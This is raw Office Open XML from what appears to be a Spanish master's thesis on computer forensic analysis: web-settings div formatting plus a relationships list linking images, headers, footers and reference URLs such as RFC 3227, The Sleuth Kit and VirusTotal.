                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1446266625">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="543912228">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="465703651">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="779766514">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="140741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55339977">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1882739324">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="936518468">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="6030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9392">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2107075698">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="171168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1934587279">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2000107885">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="986933897">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="10464865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2046797">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="19162933">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1614753229">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="550917795">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="15636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299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ninjasdelaweb.com/metodologia-de-analisis-forense/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:test12312321@mailinator.com" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.png"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:anatoly12312@mailinator.com" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bibdigital.epn.edu.ec/bitstream/15000/23797/1/CD%2013084.pdf" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/008-informe-memmap.txt" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:bwlddhjadekqa7qcrz3rsasoqxufzp1anatoly5676anatoly5676@grr.la" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:anatoly12312@mailinator.com" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=EWGUznyQIhE&amp;ab_channel=VidaMRR-Programacionweb" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:anatoly5676@grr.la" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer11.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:anatoly5676@grr.la" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rfc-es.org/pendientes/rfc3227-es.nroff" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://elinux.org/Security" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.ubuntu.com/archives/bionic-changes/2018-August/016183.html" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:anatoly12312@mailinator.com" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-nc-nd/3.0/es/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image169.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:anatoly5676anatoly5676@grr.la" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://datatracker.ietf.org/doc/html/rfc3227" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://packages.debian.org/sid/python3-certbot-apache" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:fanatoly12312@mailinator.com" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1TOKWOF_akO6IKVvXJ9ovPxMMhd9kafy1/view" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sleuthkit.org/" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.png"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:anatolyhpxecjqa@grr.la" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/005-RFC-3227-ESP.pdf" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/010-informe-tree.txt" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.png"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:test12312321@mailinator.com" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/001-ENUNCIADO-M1.881-TFM-ANALISIS-FORENSE-SISTEMAS-INFORMATICOS.pdf" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///D:\Users\jrodg85\Documents\TFM-ANALISIS-FORENSE\TFM-ANALISIS-FORENSE\TFM.docx" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 